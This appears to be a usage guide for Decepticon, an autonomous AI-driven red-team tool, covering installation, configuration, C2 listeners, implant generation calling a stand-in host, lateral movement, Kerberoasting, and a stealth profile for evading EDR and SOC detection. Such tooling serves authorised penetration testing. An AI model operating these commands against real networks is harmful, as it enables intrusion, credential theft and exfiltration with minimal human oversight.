Decepticon
Decepticon (PurpleAILAB/Decepticon on GitHub) is a professional autonomous red team agent written in Go and Python. It deploys 16 specialist AI agents organized by kill chain phase to execute realistic attack chains: initial recon, exploitation, privilege escalation, lateral movement, and C2 establishment — with minimal human intervention.
Installation
From Source (Go + Python)
# Prerequisites: Go 1.21+, Python 3.11+
git clone https://github.com/PurpleAILAB/Decepticon
cd Decepticon
# Build Go core
go mod download
go build -o decepticon ./cmd/decepticon
# Install Python agent dependencies
cd agents/
pip install -r requirements.txt
# Verify build
./decepticon --versionDocker (Recommended for Isolation)
# Build image
docker build -t decepticon:latest .
# Run with host network and volume for results
docker run -it \
--network host \
-e ANTHROPIC_API_KEY=$ANTHROPIC_API_KEY \
-v $(pwd)/ops:/ops \
decepticon:latest
# Docker Compose for full stack (includes C2 listener)
docker-compose up -dBinary Releases
# Download latest release (Linux amd64)
curl -LO https://github.com/PurpleAILAB/Decepticon/releases/latest/download/decepticon-linux-amd64.tar.gz
tar -xzf decepticon-linux-amd64.tar.gz
sudo mv decepticon /usr/local/bin/
sudo chmod +x /usr/local/bin/decepticonConfiguration
Core Configuration (config.yaml)
# ~/.config/decepticon/config.yaml
ai:
provider: anthropic
model: claude-opus-4-5
api_key: "${ANTHROPIC_API_KEY}"
max_tokens: 4096
temperature: 0.1 # Low temp for consistent decisions
operation:
name: "op-example"
target: "192.168.1.0/24"
phases:
- recon
- initial_access
- execution
- persistence
- privilege_escalation
- lateral_movement
- collection
- c2
max_parallel_agents: 4 # Concurrent specialist agents
timeout_per_phase: 3600 # Seconds per phase
c2:
listener_host: "0.0.0.0"
listener_port: 4444
protocol: https # http | https | dns | smb
ssl_cert: ./certs/server.crt
ssl_key: ./certs/server.key
output:
dir: ./ops/
log_level: info # debug | info | warn | error
save_artifacts: true
report_format: htmlAgent API Keys
# Required
export ANTHROPIC_API_KEY="sk-ant-..."
# Optional: additional intelligence sources
export SHODAN_API_KEY="..."
export VIRUSTOTAL_API_KEY="..."
export CENSYS_API_KEY="..."
# Validate configuration
decepticon config validateCore Commands
| Command | Description |
|---|---|
decepticon op start | Start a new operation with configured phases |
decepticon op resume <id> | Resume an interrupted operation |
decepticon op status <id> | Show real-time operation status |
decepticon op abort <id> | Safely abort a running operation |
decepticon agent list | List all 16 specialist agents |
decepticon agent run <name> | Run a specific specialist agent |
decepticon agent status | Show all active agent states |
decepticon phase run <phase> | Execute a specific kill chain phase |
decepticon recon <target> | Run recon agent only |
decepticon exploit <target> | Run exploitation agent only |
decepticon privesc <host> | Run privilege escalation agent |
decepticon lateral <network> | Run lateral movement agent |
decepticon c2 start | Start C2 listener |
decepticon c2 sessions | List active C2 sessions |
decepticon report <op-id> | Generate operation report |
decepticon implant generate | Generate custom implant |
Advanced Usage
The 16 Specialist Agents
| Agent Name | Kill Chain Phase | Capability |
|---|---|---|
scout | Recon | Passive OSINT, WHOIS, cert transparency |
mapper | Recon | Active port/service scanning |
spider | Recon | Web crawling, API endpoint discovery |
fingerprinter | Recon | OS/service/framework fingerprinting |
phisher | Initial Access | Spear-phishing campaign crafting |
exploiter | Initial Access | CVE exploitation, vuln verification |
weaponizer | Execution | Payload generation, delivery |
persister | Persistence | Cron, registry, service persistence |
escalator | Privilege Escalation | Local privesc via SUID, sudoers, kernel |
tokengrabber | Privilege Escalation | Credential dumping, token theft |
passer | Lateral Movement | Pass-the-hash, Kerberoasting |
mover | Lateral Movement | RDP, WinRM, SSH pivot |
collector | Collection | File exfil, keylogging, screen capture |
tunnel | Command & Control | Tunnel/proxy establishment |
beacon | Command & Control | Implant deployment, beaconing |
exfiltrator | Exfiltration | DNS/HTTPS data exfiltration |
# Run a specific agent manually
decepticon agent run scout --target example.com --output scout-report.json
decepticon agent run exploiter --target 192.168.1.50 --cve CVE-2024-1234
decepticon agent run escalator --session c2-session-01Operation Phases
# Run full kill chain
decepticon op start \
--config config.yaml \
--target "192.168.1.0/24" \
--phases "recon,initial_access,persistence,privilege_escalation,lateral_movement,c2" \
--name "client-engagement-2025"
# Run specific phases only
decepticon op start \
--target 192.168.1.50 \
--phases "privilege_escalation,lateral_movement" \
--assume-compromised \
--session existing-session.jsonC2 Operations
# Start C2 listener with HTTPS
decepticon c2 start \
--protocol https \
--host 0.0.0.0 \
--port 443 \
--ssl-cert ./certs/server.crt \
--ssl-key ./certs/server.key
# List active sessions
decepticon c2 sessions list
# Interact with a session
decepticon c2 session interact --id session-01
# Generate implant for a session
decepticon implant generate \
--os linux \
--arch amd64 \
--c2-host redteam.example.com \
--c2-port 443 \
--protocol https \
--output implant-linux-amd64Lateral Movement
# Automated lateral movement from compromised host
decepticon lateral \
--from 192.168.1.50 \
--network 192.168.0.0/16 \
--method "smb,winrm,ssh" \
--credentials creds.json \
--depth 3
# Kerberoasting workflow
decepticon agent run passer \
--method kerberoast \
--domain corp.local \
--dc 192.168.1.10 \
--wordlist /usr/share/wordlists/rockyou.txtCommon Workflows
Full Red Team Operation
# Step 1: Initialize operation
decepticon op init \
--name "corp-redteam-q2" \
--target "10.10.0.0/16" \
--external-target "example.com"
# Step 2: Start full kill chain
decepticon op start \
--name "corp-redteam-q2" \
--phases all \
--max-parallel 4 \
--checkpoint-dir ./ops/corp-redteam-q2/
# Step 3: Monitor progress in real time
watch -n 5 decepticon op status corp-redteam-q2
# Step 4: Review C2 sessions as they come in
decepticon c2 sessions list --op corp-redteam-q2
# Step 5: Generate final report
decepticon report \
--op corp-redteam-q2 \
--format html \
--include-timeline \
--include-evidence \
--output ./reports/corp-redteam-q2.htmlAssumed Breach Scenario
# Start from a known compromised workstation
decepticon op start \
--target "10.10.0.0/16" \
--phases "privilege_escalation,lateral_movement,collection,c2" \
--assume-compromised \
--entry-point "192.168.1.100" \
--entry-creds ./initial-creds.json \
--name "assumed-breach-2025"Stealthy Operation Profile
# Low-and-slow operation to evade detection
decepticon op start \
--target "10.10.0.0/16" \
--profile stealth \
--delay-between-actions 300 \
--randomize-timing \
--avoid-edr \
--c2-jitter 30 \
--name "stealth-op"Tips and Best Practices
Always use operation names — Named operations enable checkpointing; if an agent crashes or is detected, decepticon op resume <name> picks up from the last successful phase.
Set phase timeouts — Use timeout_per_phase in config to prevent runaway agents from stalling an entire operation; 3600 seconds (1 hour) is a reasonable starting point per phase.
Limit parallel agents on noisy networks — Set max_parallel_agents: 2 on blue-team-monitored environments; parallel scanning dramatically increases detection probability.
Use the stealth profile for mature SOCs — The --profile stealth flag applies exponential backoff jitter between tool invocations and uses encrypted C2 channels by default.
Keep implants off disk — The beacon agent supports in-memory execution; use --fileless flag when generating implants to avoid AV/EDR triggering on disk writes.
Checkpoint everything — Set --checkpoint-dir so each phase result is saved; this lets you share partial results mid-engagement and reconstruct the attack chain for the report.
Rotate C2 infrastructure — Generate separate implants per target subnet with different C2 callback domains to limit blast radius if one beacon is burned.
Review agent decisions — Set log_level: debug and review agent decision logs after each phase to understand why the AI chose specific exploit paths — valuable for debrief reports.